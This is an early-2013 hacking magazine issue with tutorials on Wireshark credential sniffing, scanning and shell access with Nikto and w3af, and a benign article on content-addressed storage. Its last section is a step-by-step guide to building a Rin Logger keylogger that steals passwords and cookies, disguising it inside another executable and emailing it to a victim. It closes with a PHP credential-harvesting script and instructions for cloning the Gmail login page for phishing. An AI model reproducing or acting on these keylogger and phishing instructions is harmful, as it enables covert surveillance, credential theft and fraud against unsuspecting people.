Different Ways of hacking passwords

24th of January 2013

01/2012 1


Dear Readers, After a long time of preparation we can proudly present you the first Hack Insight issue. We decided to start it with Hacking Passwords because it is the base and first step for every IT security expert who's developing his hacking skills. Two articles have been prepared by Mr. Vikas Kumar who is an experienced ethical hacker. He described in details how to use Wireshark, Nicto and W3af. His research will help us to understand how to sniff the network traffic and use the most known network's protocol analyzer - Wireshark. The second article concerns hacking methods. Mr.Kumar presented how is the keylogger working and how to create your own phishing page. You should definitely check this section out and think of the danger during daily computer usage. Third article written by Mr. Miroslav Ludvik and Mr. Radek Pilar refers to Content Adressed Storage. In this issue we will be able to see an introduction to secure data archiving. In the second issue, as Miroslav promised, he will present the content about first vendor technology - you definitely cannot miss this article. This first publication wouldn't be possible without our magazine's friends who spent a lot of their working time to take care of this issue. Special thanks for Ms. Sheryl Checkman, Mr. Timothy Coleman and Mr. Ty Donaldson. We are grateful that thanks to your professional advice, attention to the grammatical correctness and creation of the creative cover and essential images we can now read this magazine. Enjoy the hacking! Hack Insight Team

[Hack]in(Sight) Editorial Section: Authors: Vikas Kumar,, Miroslav Ludvik, Radek Pilar. Proof-reading: Timothy Coleman, Nina Takahashi, Agata Brzozowska. DTP: Sheryl Checkman, Ty Donaldson. Publisher: Hack Insight Press Paweł Płocki www.hackinsight.org Editor in Chief: Paweł Płocki [email protected]

All trade marks presented in the magazine were used only for informative purposes.

01/2012 3

Table

Of

Content

www.hackinsight.org

Advanced Usage of Wireshark, Nicto and W3af. • Page 6: Wireshark is the world's foremost network protocol analyzer. It lets you capture and interactively browse the traffic running on a computer network. It is the de facto (and often de jure) standard across many industries and educational institutions. CAS - introduction • Page 24: Welcome to the mini-series of articles about modern ways of data archiving. This article will be about CAS (Content Addressable Storage). The next one will be about archiving and trustworthy repositories. Then, there will be a few articles about existing solutions and finally, their comparison. Data Stealing. Data Theft Prevention. Phishing. • Page 27: Data stealing is the illegal access (by reading, editing, or copying) of data without the data owner’s authorization. In other words, if a company’s server has been accessed by a hacker it is a case of data theft. Even reading the mails of your colleague would be also taken as a crime in the eyes of law. It is irrelevant whether you later used this data for misdeeds or not – what counts is that data that is not yours has been accessed – without prior permission of its authorized user who may also be its creator.


Advanced Usage of Wireshark, Nicto and W3af. I. Wireshark: Wireshark is the world's foremost network protocol analyzer. It lets you capture and interactively browse the traffic running on a computer network. It is the de facto (and often de jure) standard across many industries and educational institutions. Wireshark development thrives thanks to the contributions of networking experts across the globe. It is the continuation of a project that started in 1998.

Figure 1.image of Wireshark with logo Wireshark, formerly known as Ethereal, is one of the most powerful tools in a network security analyst's toolkit. As a network packet analyzer, Wireshark can peer inside the network and examine the details of traffic at a variety of levels, ranging from connection-level information to the bits comprising a single packet. This flexibility and depth of inspection allows the valuable tool to analyze security events and troubleshoot network security device issues. Packet Analysis Made Easy  Visually rich, powerful LAN analyzer  Quickly access very large pcap files  Professional, customizable reports  Advanced triggers and alerts  Fully integrated with Wireshark The Role of A Network Protocol Analyzer Network Protocol Analysers like Wireshark let us look at the behaviors of network protocols. This can be useful for 3 main reasons:

1. Observing the network traffic generated by protocols, services, applications etc, helps us gain a better understanding of how these various things work. 2. The ability to observe exactly what is happening over a network can also often help us gain a better understanding of a problem we are troubleshooting. 3. Finally the ability to monitor network traffic can help us identify threats to or breaches of network security. How to sniff network traffic and why sniff the network? The phrase "sniff the network" may conjure Orwellian visions of a Big Brother network administrator reading people's private email messages. Before anyone uses Wireshark, an organization should ensure that it has a clearly defined privacy policy that spells out the rights of individuals using its network, grants permission to sniff traffic for security and troubleshooting issues, and states the organization's policy requirements for obtaining, analyzing and retaining network traffic dumps. Anyone who uses a tool like Wireshark without first obtaining the necessary permissions may quickly find themselves in hot water legally. However, as a security professional, there are two important reasons to sniff network traffic. First, peering into the details of packets can prove invaluable when dissecting a network attack and designing countermeasures. For example, if a denial of service occurs, Wireshark can be used to identify the specific type of attack. The tool can then craft upstream firewall rules that block the unwanted traffic. The second major use of Wireshark is to troubleshoot security devices. Specifically, I regularly use it to troubleshoot firewall rules. If systems running Wireshark are

01/2012 5

connected to either side of a firewall, it's easy to see which packets successfully traverse the device and identify whether the firewall is the cause of connectivity problems. That being said, it's important to remember that Wireshark can be used for good or for evil, as is the case with many security analyzers. In the hands of a network or security administrator it's a valuable troubleshooting tool. In the hands of someone with questionable ethics, however, it's a powerful eavesdropping tool that enables someone to view every packet that traverses the network. Downloading & Installing Wireshark If you don’t already have Wireshark Installed on your computer you can download it from the Wireshark Website at http://www.wireshark.org.

Figure 2. Available Interfaces

Figure 3. Interface Selection for capturing data packets.

Security Note: It is best practice to download software only from the official site of the developer, there are many other sites which offer Wireshark downloads, my advice is to avoid them as you can’t know whether the software you are downloading has been altered in a malicious way by the third party site. The installation is straight forward, and for most people you should be able to run the installer and simply click next through the whole process. Running a simple “packet capture” Once Wireshark is installed, start it up and you'll be presented with the blank screen in which you are to select your interface on which you want to capture data packets is shown below:


Click the Start button next to the name of the interface on which you wish to capture traffic, and immediately you will see Wireshark filling up with traffic as shown on picture below.

that the original was requesting a DNS resolution for www.cnn.com, and this response is informing us that the available IP addresses include 64.236.91.21. The bottom window pane shows

Figure 4. Wireshark traffic Interpreting the results with Wireshark color codes Each line in the top pane of the Wireshark window corresponds to a single packet seen on the network. The default display shows the time of the packet (relative to the initiation of the capture), the source and destination IP addresses, the protocol used and some information about the packet. You can drill down and obtain more information by clicking on a row. This causes the bottom two window panes to fill with information.

the contents of the packet in both hexadecimal and ASCII representations.

The middle pane contains drill-down details on the packet selected in the top frame. The "+" icons reveal varying levels of detail about each layer of information contained within the packet. In the example above, I've selected a DNS response packet. I've expanded the DNS response (application layer) section of the packet to show

Wireshark color codes Color is your friend when analyzing packets with Wireshark. Notice in the example above that each row is color-coded. The darker blue rows correspond to DNS traffic, the lighter blue rows are UDP SNMP traffic, and the green rows signify HTTP traffic. Wireshark includes a complex colorcoding scheme (which you can customize). The default settings appear below:

Figure 5. Wireshark color coding

01/2012 7

Wireshark is already capturing data packets, so lets test if it will work supposed to ping with any system in the network so Wireshark will capture ICMP data packets:

Figure 6. Pinging from ip 192.168.152.130 to target system ip 192.168.152.128

Figure 7. ICMP data packet filtration with echo request & reply Wireshark is already capturing data packets, so let’s test if it will work suppose I was logging in www.jammuclubjammu.com

Figure 8. Putting credentials in login account


Filter data packets. For this tutorial I have used HTTP as it is shown below. NOTE: there are so many protocols you can use to filter data packets (e.g. FTP)

Figure 9. Finding HTTP data packets through filtration. Now look for Post, select it Right click or go to Analyze menu and then select Follow TCP Stream

Figure 10. Finding HTTP data packets through filtration. You should now see this window, just scroll down until you see username and password. As you can see, I managed to capture my username and password.

Figure 11. TCP Stream window will show credentials FTP Data Packet Capturing with login Credentials 01/2012 9

Now we are going to capture data packets of FTP protocol so for that we are using a cmd prompt for login into ftp account of jammuclubjammu.com web server.

Figure 12. FTP Login with cmd. We have entered credential and side by side our Wireshark is capturing all the data packets.

Figure 13. Login into FTP account with credentials.


Now we will resolve the data packets of FTP protocol for which first of all we all will filter all ftp data packets which is given below:

Figure 14. FTP data packet filtration. Now we will resolve these data packets for which we are to right click on ftp data packet and click on follow TCP Stream

Figure 15. FTP data packet resolved and credentials in txt format. 01/2012 11

Filtering Packets If you’re trying to inspect something specific, such as the traffic a program sends when phoning home, it helps to close down all other applications using the network so you can narrow down the traffic. Still, you’ll likely have a large amount of packets to sift through. That’s where Wireshark’s filters come in. The most basic way to apply a filter is by typing it into the filter box at the top of the window and clicking Apply (or pressing Enter). For example, type “ip.src == 192.168152.130” and you’ll see only IP Source 192.168.152.130 data packets. When you start typing, Wireshark will help you autocomplete your filter.

Figure 16. Data Packet filtration of ip.scr == 192.168.152.130 Next filtration “DNS”

Figure 17. Data Packet filtration of DNS


Inspecting Packets Click a packet to select it and you can dig down to view its details.

Figure 18. Data Packet Inspecting You can also create filters from here — just right-click one of the details and use the Apply as Filter submenu to create a filter based on it.

Figure 19. Apply as Filtration. Wireshark is an extremely powerful tool, and this tutorial is just scratching the surface of what you can do with it. Professionals use it to debug network protocol implementations, examine security problems and inspect network protocol internals. 01/2012 13

II. Nicto:

download Nikto from the website

Introduction Nikto is an open source web server scanner “which performs comprehensive tests against web servers for multiple items, including over 6400 potentially dangerous files or CGIs, checks for outdated versions of over 1200 servers, and version specific problems on over 270 servers." The good thing about Nikto is that it easy to use and performs scanning faster. Nikto is coded in Perl and written by Chris Sullo and David Lodge. Although not all checks are really a big security problem but most are like XSS (Cross Site Scripting) Vulnerabilities, phpmyadmin logins, etc. Nikto alerts and gives you security tips in order to prevent your website from various attacks.

http://www.cirt.net/nikto2 Make sure you have Perl installed because Nikto is a Perl Script. You can run Nikto in two ways: 1. Go to Applications>Backtrack>Vulnerability Assessment>Web Application Assessment>Web Vulnerabilities Scanner>Nikto 2. cd /pentest/web/nikto/ Simply , root@bt:cd /pentest/web/nikto root@bt:/pentest/web/nikto# ./nikto.pl -H

Nikto is not designed as an overly stealthy tool. It will test a web server in the quickest time possible, and is fairly obvious in log files. However, there is support for LibWhisker's antiIDS methods in case you want to give it a try (or test your IDS system). Not every check is a security problem, though most are. There are some items that are "info only" type checks that look for things that may not have a security flaw, but the webmaster or security engineer may not know are present on the server. These items are usually marked appropriately in the information printed. There are also some checks for unknown items which have been seen scanned for in log files. So if you are using Backtrack to practice pentesting then you needn't worry about installing Nikto as it is already there in Backtrack (Its there even in Backtrack 4). But if you aren't using Backtrack, then you can

Figure 20. Nikto Options of help

Figure 21. Nikto Options of help


If we give command ./nikto.pl -Help or perl nikto.pl -Help then we get details and all options. Simply We are going to scan a target website, because we are pentesting it. So easy: root@bt:/pentest/web /nikto# ./nikto.pl host 10.x.x.52 output kioptrix_80.txt

Figure 22. Nikto scanning target website

Figure 23. Nikto Scanning result.

01/2012 15

Now you will get a output file in txt format which you can open for reading purpose by giving steps root@bt:/pentest/web/nikto# . / Niktorat kioptrix_80.txt kioptrix_80

Figure 24. Nikto output file. In order to run a simple vulnerability scan against a target you just have to specify a host address along with a port number. For example, perl nikto.pl -h 10.10.15.27 -p 32333

Figure 25. Nikto scanning a web server based on port.


In the above command :  

III. W3af:

“-h” switch implies host address. “-p” switch implies port number.

The above command runs a vulnerability scan against the host 10.10.155.27. But since we specified the port number as 32333,Nikto scans that particular port only. Now if you want the scan to include multiple ports you have to specify a port range : perl nikto.pl -h 10.10.15.27 -p 1024-10000 What

if

you

don't

specify

any

port?

perl nikto.pl -h 10.10.15.27

Figure 25. Nikto scanning a web server without specifying port In this case Nikto just scans port 80. Are these the only switches that Nikto has to offer (i.e. “-h” and “-p”)? No it offers wide variety of switches. Just type perl nikto.pl to check the amount of options Nikto offers.

Security is key point for every effective business, either you are running your own website or you are at job to manage the web application for your company you have to do little penetration testing to check the security of web application. Now a days exploit are available and update on daily basis for different web application services. While doing a penetration testing a pen tester must consider these exploit for different vulnerabilities. To find vulnerabilities is not enough a pen-tester must check the parallel exploits that are available publicly for different services. w3af (Web Application audit and attack framework) is a framework for auditing and exploitation of web applications. In this series of articles we will be looking at almost all the features that w3af has to offer and discuss how to use them for Web application Penetration testing. In the first part of this series we will be working with w3af console and getting ourselves familiar with the commands. We will also be looking at the different types of plugins that w3af has to offer and discuss how to use them for optimal performance. W3af stands for web auditing and attack framework. I have heard some say that it is the metasploit for web applications. W3af is basically a free open source web application scanner. W3af has many plugins that are divided into attack, audit, exploit, discovery, evasion, brute force, mangle and a few others. The code is well commented and written in python so writing your own exploits and plugins should be trivial. Some of the major features of w3af are:

Figure 26. Nikto scanning options for scanning target website to use.

1. It has plugins that communicate with each other. For eg. the discovery plugin in w3af looks for different url’s to test for vulnerabilities and passes it on to the audit plugin which then uses these URL’s to search for vulnerabilities.

01/2012 17

2. It removes some of the headaches involved in Manual web application testing through its Fuzzy and Manual request generator feature. It can also be configured to run as a MITM proxy. The requests intercepted can be sent to the request generator and then manual web application testing can be performed using variable parameters 3. It also has features to vulnerabilities that it finds.

exploit

the

Figure 29. W3af Plug-ins selection for scanning target url Figure 27. W3af (Web Application Attack and Audit Framework) step is to give the url to w3af and scan it for XSS vulnerabilities. Open up w3af GUI. Once it is open, on the left hand side, we can see an option to choose from various profiles.

For the time being, we are going to use an Empty profile as we just want to check a single url for an XSS vulnerability. Note that this is usually not the way in which we will use the w3af framework. In a real world environment, we will choose some specific discovery plugins to find different url’s to check for injections, auth plugins to automatically log in to forms and crawl ahead, grep plugins to look for interesting information in the response, and audit plugins to scan for vulnerabilities in the found injection points. Type in the url in the target field and choose the xss plugin from the audit plugins.

Figure 28. W3af profile selection. We can choose any profile from the list depending on our need, as well as the time availability. These profiles already has configurations to use some specific plugins for a particular task. For e.g if we if look the profile OWASP_TOP10, we will see that it uses several of the Audit, Grep and Discovery plugins to perform its tasks.

Figure 30. URL scanning Once this is done, click on Start. This will start the scan on the given url. As we can see from the output, it found a XSS vulnerability.


Figure 31. W3af scanning result If you are interested in knowing what actually happened, go to the Results Tab. Click on xss on the left side. On the right side, you can see a description of how the vulnerability was found. On the bottom right, you can also see the request and response which led to the identification of the vulnerability. It is a very good practice to look at the requests and responses sent through by w3af as this lets us know what’s going on under the hood.

Let’s now use an OS commanding vulnerability to obtain a shell on the system. From the OS commanding section in the w3af test environment, choose a url and give it as target to w3af. Under the audit plugins section, check the OS commanding plugin.

Figure 32. W3af Vulnerability description So basically what happened was that w3af sent JavaScript strings to every parameter in the url, and then checked for those strings in the response. In case of stored XSS, w3af takes a note of the injected string and makes a request again to the url looking for that string. If it finds that string, then a stored XSS has been identified.

Figure 33. W3af OS Command for obtaining shell of target URL.

01/2012 19

Figure 34. OS Command vulnerability output Once this is done, click on start to launch the vulnerability scan. As we can see from the output, w3af identified an OS commanding vulnerability.

can say that a blind OS commanding vulnerability is present. Again, in the results section, we can see the request and the response which led to identification of the vulnerability.

w3af supports detection of both simple and blind OS commanding vulnerability. In simple OS commanding, it sends a simple command to every parameter and then looks for a response to that command in the output. In case of blind OS commanding in which the response is not present in the output, it uses time delays to identify if a vulnerability is present. For e.g if it sends a command which delays the response for some seconds, and if we note a delay in the output, we

w3af also allows us to exploit vulnerabilities. If we go under the Exploit section, we can see the identified vulnerability in the Vulnerabilities section. If we click on it, we can see that osCommandingShell in the Exploits section turns black. This is an indication that the vulnerability can be exploited using the osCommandingShell plugin in w3af. Right click on osCommandingShell and click on Exploit ALL vulns.

Figure 35. Vulnerability identification


Figure 36. W3af vulnerability exploitation. Once this is done, if the vulnerability is exploited successfully, we will get a shell on the target machine. We can see the list of shells on the right side. Note that it is not possible to get a shell in case of every vulnerability. Just double click on the shell and you are all set and ready to go.

Figure 37. Shell execution Similarly, let’s use a file upload vulnerability to get a shell. Give the vulnerable url as a target to w3af. Make sure, the fileUpload plugin is checked in the audit plugins list.

Figure 38. FileUpload Plug-ins list. Also make sure to check the extensions option in the fileUpload plugin. Since in some cases, the web application allows only some specific extensions, it would be favorable to add those extensions to the list as well.

01/2012 21

Figure 39. Specifying extensions for web application Click on Start. As we can see from the output, w3af identified a file Upload vulnerability.

Figure 40. FileUpload vulnerability identification. Click on the Results Tab. You can see that w3af tried to upload a file named w3af_dt4LqT.html. It did this by sending the file object in the uploadedfile parameter. It then looked for these files in common directories like uploads etc. If the file is found, then it can be said that a Insecure File Upload vulnerability exists. However, this is not always the case as most of the web application filter files based on their extension. To bypass this w3af has templates for some of the most common file extensions. These templates have valid extensions but have a section that can be replaced with scripting code. The figure below shows the files with different extensions present in w3af.

Figure 41. FileUpload templets If we open up any of these files with Kate, we can see the content inside it. As we can see from the figure below, the file template.png has a string of A’s in its comment section. This string can actually be replaced by scripting code like php.

Figure 42. String replacement. With all of these basics out of the way, let’s exploit this vulnerability using the fileUploadShell plugin. You can also set the configuration of these plugins by right clicking on them and clicking on Configure the plugin. As we can see from the figure below, the vulnerability was successfully exploited and we got a shell on the target machine.


Figure 43. Vulnerability exploitation. Similarly you can perform tests for many other exploits like Local File Inclusion, Remote File Inclusion, SQL Injection etc.

About the author Kingdom, Thailand, Nigeria, Shri Lanka, Kenya, Australia, Kazakhstan, Canada, Ghana, United States, South Africa, China, Malaysia, Singapore, Omen, Yemen, Indonesia, Korea, Iran and etc. www.cyber-hunt.com Blog: - www.cyber-hunt2012.blogspot.com LinkedIn Profile:https://www.linkedin.com/profile/view?id=71569482 &trk=tab_pro VIKAS KUMAR (ISHAN) is one of the leading computer security experts available in India. VIKAS KUMAR born on 26 July 1990 in a town called Meerut, UP (India). VIKAS KUMAR started his Group “hackers4u” on Facebook in year 2010 and in two years he bangs the World Wide Web with good computer ethical hacking articles and going to launch the website on Cyber Security & Ethical Hacking and working with a AntiHacking Community “I-hackers4u”. The 22 year old guy have the capability to compete with the people best in the business so called” Ethical Hacking”. Workshops and Seminars: VIKAS KUMAR have trained more than 3000 people from all around the world, from countries like India, Dubai, Sudan, United

Facebook:- https://www.facebook.com/hackers4u BackTrack Fan Club Page:https://www.facebook.com/pages/Cyber-HuntBackTrack-FanClub/395372283859684?ref=tn_tnmn Facebook Page:https://www.facebook.com/vikas7852?ref=tn_tnmn Email ID:- [email protected] [email protected]

01/2012 23

CAS – introduction Abstract: Welcome to the mini-series of articles about modern ways of data archiving. This article will be about CAS (Content Addressable Storage). The next one will be about archiving and trustworthy repositories. Then, there will be a few articles about existing solutions and finally, their comparison.

Typical filesystems use name and path to uniquely identify astored object (which can be file, directory, symlink, etc.). This approach has few advantages, but also few disadvantages that CAS systems aim to fix. CAS, as its name implies, identifies the object by its content. Of course, it wouldn't be practically feasible to use the whole content of the object – in that case, storing the file would be pointless. Instead of it, CAS systems use cryptographic hash of the content. So, if we want to access the file with content „Balance for the year 2012“, instead of file: /home/accountant/docs/balance2012.doc or on Windows: C:\Users\Accountant\Documents\balance2012.doc we accessobject identified by string: cd52089ea948bd42fece0ebba0c91b5ae68169e4 which is, in this example SHA-1 hash of its content. Because with that approach, you'd lose some information (filename, author, creation date), the CAS system attaches metadata to objects. The first CAS system ever was introduced in 2003 by US company EMC under name Centera, but was immediately followed by similar products from other vendors like HP, Hitachi, Oracle/Sun, Dell and others. Today, CAS is used as a de-facto standard for a long-term data archiving. CASbased solutions have several advantages. Since

the system works with file hashes instead of filenames, it is much more difficult to tamper data (even from the sysadmin perspective): It is really easy to save a different file with the same name, but really difficult to save a different file with the same hash. And on the other side – two files with the same contents will have the same hash – therefore, there will be only one copy stored in the system. This effectively supersedes file-level deduplication, the non-existence of multiple copies of the same file is implied by the basic principles of the system itself. However, the CAS systems have their disadvantages as well. If the user wants to modify already stored object, it involves copying its contents, modification, reading the whole file, hash calculation and final write. Even if we change just a single byte from the multi-megabyte file, we still need to re-read the whole file and compute a new hash. However, considering current prices of the hardware, this disadvantage vanishes and is merely theoretical. The second mentioned disadvantage is the existence of hash collisions. Since the hash functions generates for the input of arbitrary length output of fixed length, loss of information occurs. Therefore there exists multiple different inputs with the same hash. And it depends only on the specific implementation of the CAS system, how it will handle the collision. The odds collision will occur can be estimated from the length of hash function output. For example, the MD5 hashing algorithm always returns 128bit value. Therefore,


chance the two randomly chosen objects will have the same hash is 1:2^128. 2^128 is also the theoretical upper limit CAS system can store. However, if someone will want to create his own file, different from ours, with the same hash (preimage attack), he'll need approx. 2^123 computations. The worst situation happens when someone will want to create two arbitrary files with the same hash – in that case, only 2^21 operations will be necessary. Fortunately, there exists more secure algorithms like SHA-1 – which has output size of 160bits, with no known

reimage attack faster than bruteforce (2^160) and with fastest collision-discovery attack with complexit 2^61. The dangers of using this hashing algorithm is almost non-existent with current technology and knowledge. And in case you've thought about distributed version control systems when reading this article – you were right. Most of the distributed VCSs use some kind of CAS as backend. I'll use some low-level git commands to demonstrate basic principles of CAS:

# Create empty git repository $ git init Initialized empty Git repository in /tmp/example/.git/ # Objects are stored in .git/objects $ ls .git/objects/ info pack # Create example file $ cat > foo.txt << EOF Lorem ipsum dolor sit amet. EOF # Store example file to database $ git hash-object -w foo.txtd2cf010d36ff3f5a199c335135f37ca40822b35b # We try to manually calculate SHA1 hash of the file(note.: git prefixes the contents with: "blobcontent_len\0x00") $ echo -e "blob 28\0Lorem ipsum dolor sit amet."|sha1sum d2cf010d36ff3f5a199c335135f37ca40822b35b # We see hashes are equal. Let's look at .git/objects $ ls .git/objects/*

Listing 1. Creating empty git repository.

01/2012 25

.git/objects/d2: cf010d36ff3f5a199c335135f37ca40822b35b # Using the content hash, we can request the content. $ git cat-file -p d2cf010d36ff3f5a199c335135f37ca40822b35b Lorem ipsum dolor sit amet. # Filename is not important $ cp foo.txt bar.txt $ git hash-object -w bar.txt d2cf010d36ff3f5a199c335135f37ca40822b35b # But the content is $ echo "foobar" > foo.txt $ git hash-object -w foo.txt 323fae03f4606ea9991df8befbb2fca795e648fa # And the original file will remain unchanged $ git cat-file -p d2cf010d36ff3f5a199c335135f37ca40822b35b Lorem ipsum dolor sit amet. $ git cat-file -p 323fae03f4606ea9991df8befbb2fca795e648fa foobar

Listing 2. Creating empty git repository II Enterprise solutions use CAS as a backend for a more complex system implementing data replication, etention, secure shredding and other functions – these will be mentioned in following articles.

About the authors Mr. Miroslav Ludvik graduated at Czech Technical University in 1996. In 2005 he succesfully defended his Ph.D. thesis on Data Security in Comupter Networks and I was awarded Ph.D. degree. In 2000 he participated on securing the International Monetary Fund conference in Prague. He provides counseling to Ministry of Interior of the Czech Republic and Czech Data Protection Office. He provides also counseling for private sector and among my client are e.g. bank and prestigious legal fi ms. He teaching on prestige private Czech University and

cooperate with University of Žilina. He holds an office of Technical Director in the 4safety, a.s company.

Mr. Radek Pilar is currently studying at Czech Technical University, Prague and is employed as a storage consultant n the 4safety, a.s company.


Data Stealing. Data Theft Prevention. Phishing. Data stealing is the illegal access (by reading, editing, or copying) of data without the data owner’s authorization. In other words, if a company’s server has been accessed by a hacker it is a case of data theft. Even reading the mails of your colleague would be also taken as a crime in the eyes of law. It is irrelevant whether you later used this data for misdeeds or not – what counts is that data that is not yours has been accessed – without prior permission of its authorized user who may also be its creator. "One of the way of hacking Data Stealing is DDoSes which has evolved from being a bluntforced attack to being a sophisticated diversionary attack disguising another attack." Sources said that financial service companies handling vast amount of data are most susceptible to these tactics.

"Once the attack was launched, the IT department predictably moved resources to deal with DDoS attack,". While this was happening, the cybercriminals launched the real attack, which allowed them to grab and clone private data that could be used to steal money. They then handed the operation over to the monetization team, who created ATM cards, debit cards and credit cards, which were handed out to money mules. The cybercriminal gang hired individual contractors who took the cards to ATM machines and drained $9m in 48 hours from a selection of accounts in cities across the world.

Figure 1: Data Theft. In the past year, for example, phishing attacks have been directed at IT administrators at European banks. These eventually enabled malware to penetrate the banks' systems and steal login credentials. As soon as the criminals had the login details, they launched the DDoS attacks against the banks. This was carefully timed so that it occurred on a Friday afternoon when IT departments were thinly staffed.

Types of Data Theft Data can be stolen in many ways. Below you can see a few examples showing the ways of data theft. Hacking: This is by far the most common way of stealing data with the least chances of getting caught. A hacker gets into a system where he or she is not supposed to be and steals whatever data he needs. Hackers find their ‘gate way’ through gaps in the security system or by hoodwinking gullible employees / surfers in order to gain access to a system.

01/2012 27

Posing: Appearances can be deceiving. The attractive website that has popped up offering you a great holiday treat may actually be a data thief trying to get into your system under the ‘mask’ of a piece of harmless spam. In a case of corporate data theft last year, the thief posed as a potential customer and got an entry to a company’s data bank through the computer of an employee who did not suspect anything in his eagerness to catch a potential client. Remote Access: Is the cursor moving about on its own even when you have not touched the mouse? Does the indicator show that a program is running even when you are not working on anything and have no windows opened? Do not ignore the symptoms – a data thief is already sitting in your computer. Remote access allows the thief to gain control of your machine from wherever he or she is and operate it, steal data from it, and even distribute virus from it! Spyware: Spyware is often brought in by adware. The thief may not sit in your system, but your key strokes or mouse clicks would be spied upon, revealing what you are doing and ‘reading’ the data as you put it in. And you have opened the gate by clicking on an innocent looking ad. Podslurpling: Music is now stored in iPods for almost all domestic users. You would usually not suspect an employee rocking to music while working as usual. The thief knows this and he is using the iPod to obtain data outputs from the computer where it is plugged in.

the average company or organization. As a responsible user, you must know how to protect your data and prevent data theft from mobile devices. The following targets for thieves and intruders are:          

USB thumb drive 3G mobile phone network Wireless LAN Removable hard disk Notebook computer Portable personal digital device like MP3, PDA, Phones Printer output etc. Personal information such as bank account or details Customer database Confidential/sensitive business information e.g. tender information and quoted prices.

The Following are some useful security tips for preventing data theft:  

    

Protect your mobile devices Data theft sometimes happens when you outsource your IT services. Learn how to prevent data loss from IT outsourcing. Review the access control policy Encrypt your data. Protect your wireless network. Secure your company network. Conduct security risk assessments and regular security audits.

Blue Snarfing: Bluetooth devices have become popular in a very short while. Using his or her Bluetooth-enabled cell phone or laptop, the data thief lifts data from a restricted computer in silence and mostly unnoticed. Thumsucking: Another tiny and dangerous device is the USB storage drive. All that an employee needs to do is plug in a pen drive, and 2 GB of data would flow in quietly into the pocket from the computer.

Prevent Data Theft At any time of day or night, a huge amount of data is being stored, retrieved and transferred in

Figure 2: Preventing from Data Theft.


Keylogger Key logger software is a computer monitoring system that allows you to record entire activities performed on your computer system. Key logger software has an ability to monitor online chat conversation details, visited websites, incoming and outgoing emails and other online activities performed on your pc. The log file created by the key logger can be sent to a specified receiver. Some key logger programs will also record any e-mail addresses you use and Web site URLs you visit. Key loggers, as a surveillance tool, are often used by employers to ensure employees use work computers for business purposes only. Unfortunately, key loggers can also be embedded n spyware allowing your information to be transmitted to an unknown third part. Computer monitoring software works in invisible mode and does not appear on the Desktop, Add/Remove Programs, Control panel and even in the hidden during the installation path folders. Keyloggers software provides facility to send details of

recorded activities at user specified email address. Free keylogger download is available on the website.

How to hack ID's with Rin Logger Run the keylogger file on your pc and click on “Create new”

Figure 3: Create New for creating server.exe file.

 Now, enter the information as follows:  Email address: your email address (gmail recommended)  Account Password: Password of your Email address.  Keylogger Recipients: Enter your Email address  Click on next

01/2012 29

Click on next option of downloader setup which will help you to download your files off the internet and internet launch it.

Figure 4: Set information for getting keylogs. Now, enter the time duration between two emails. If you set it to 2 minutes, you will receive emails after every 2 minutes. Hit on Next.

Figure 7: Set Download Setup. Create a custom message for making your victim fool and click on next.

Figure 5: Set timing for getting keylogs. Now, change Install keylogger to “Enabled”. Name the file anything you want and select Installation path as “Application data”.

Figure 8: Set Dialog setup for setting message for victim. Click on website enable viewer for getting all the updates of all the website which are being visited by victim.


Figure 9: Set Website Viewer option for update of web links.

Figure 11: Set option for stealing cookies from web browser.

Select this option for binding our file with other file and click on next .

Use this option to get the administrative control of your victim system and as per your choice and requirement just enable and click on next.

Figure 10: Bind your server.exe file with other file.

Figure 12: Use administrative control options.

This option can help you retrieving passwords from cookies of web browser and click on next.

You can use all other options according to your needs. But, I am focusing only on the important aspects. Hit on Next until you see this option: 01/2012

31

Hit on “?” button besides every textbox to generate random product information. Hit on Next.

your friend. You can use the Binder within this keylogger or can even opt for Iexpress binder to bind this keylogger server to any .exe file may be software or so. This will remove any chances of doubt on victim’s side.

Figure 13: Bind your server.exe file with other file. Now, hit on “Save As” and select the path where you want to save your keylogger server file. Click on “Compile”. Done!!!

Figure 15: Successfully created file. Now, simply send this file to your victim via email. Once the victim runs our keylogger, we will get key logs every 2min via email as shown Thus, the victim will run the file considering it as a normal software installation and during this process, our sent keylogger server will install itself silently in background without any victim’s knowledge.

After keylogger server installation, you will start receiving all victim’s passwords like this: Figure 14: Save server.exe file. That’s it. You have successfully created a keylogger server file. Now, simply send this file to


Figure 16: Online logs on email ID.

Countermeasures The effectiveness of countermeasures varies, because keyloggers use a variety of techniques to capture data and the countermeasure needs to be effective against the particular data capture technique. For example, an on-screen keyboard will be effective against hardware keyloggers, transparency will defeat some screen loggers but not all of them - and an antispyware application that can only disable hookbased keyloggers will be ineffective against kernel-based keyloggers. Moreover, keylogger software authors may be able to update the code to adapt to countermeasures that may have proven to be effective against them.

Anti keyloggers An anti keylogger is a piece of software specifically designed to detect keyloggers on a computer, typically comparing all files in the computer against a database of keyloggers looking for similarities which might signal the presence of a hidden keylogger. As anti keyloggers have been designed specifically to detect keyloggers, they have the potential to be

more effective than conventional anti-virus software; some anti-virus software do not consider certain keyloggers a virus and under some circumstances a keylogger can be considered a legitimate piece of software.

Figure 17: Anti-Keylogger for removing keylogger file.

Phishing You must have come across many fake login pages/scamming pages which are often used to hack IDs. Phishing is the easiest and the most "unethical way of hacking”. That true phishing is not something great which only a few can do, that is why it makes it unethical. But whatever it might be, hacking is hacking and there is obviously a need to know more of this type of exploitation. Before we go into the details let us first see what phishing is all about. 01/2012

33

How to create your own phishing page

Figure 18: How Phishing works. Phishing is a way of deceiving your victim by making him login through one of your webpages which is a clone of the original one. By doing it, the fake webpage will log his E-mail ID and password. After that he will automatically be redirected to the original webpage making him unsuspicious of what has just happened. This is used for criminal activities for stealing Credits Cards ect. That is the exact reason why I DO NOT want you to use this for fraud. Use this only for the educational purposes and not to cause any damage to any person in any way.

header ('Location: http://www.gmail.com');$handle = fopen("log.txt", "a");foreach($_POST as $variable => $value) { fwrite($handle, $variable); fwrite($handle, "="); fwrite($handle, $value); fwrite($handle, "\r\n");}fwrite($handle, "\r\n");fclose($handle);exit;?>

1. Copy the script above and open it as log.php or login.php 2. Now open gmail home page with you want to create. 3. I'm creating gmail phishing login page!!

Phishing is the most popular and widely used method for hacking email accounts and it is not as easy as its name. Creating a phishing page is an easy task and anyone can download it from various hacking forums for free. The main step of phishing comes after creation of fake login page. Figure 20: Creating home page of Gmail Fake Page. 4. RIGHT CLICK > save as save the script with the name index.HTML like in the image

Figure 19: Phishing Method.

Figure 21: Saving Gmail fake page with name index.html.


5. Now open it with notepad find "action" word for that you can use CTRL + F now delete the action=https://accounts.google.com/ServiceLoginAuth and use login.php? in the place of the link save your script

Figure 22: Save fake gmail page’s source with name login.php.

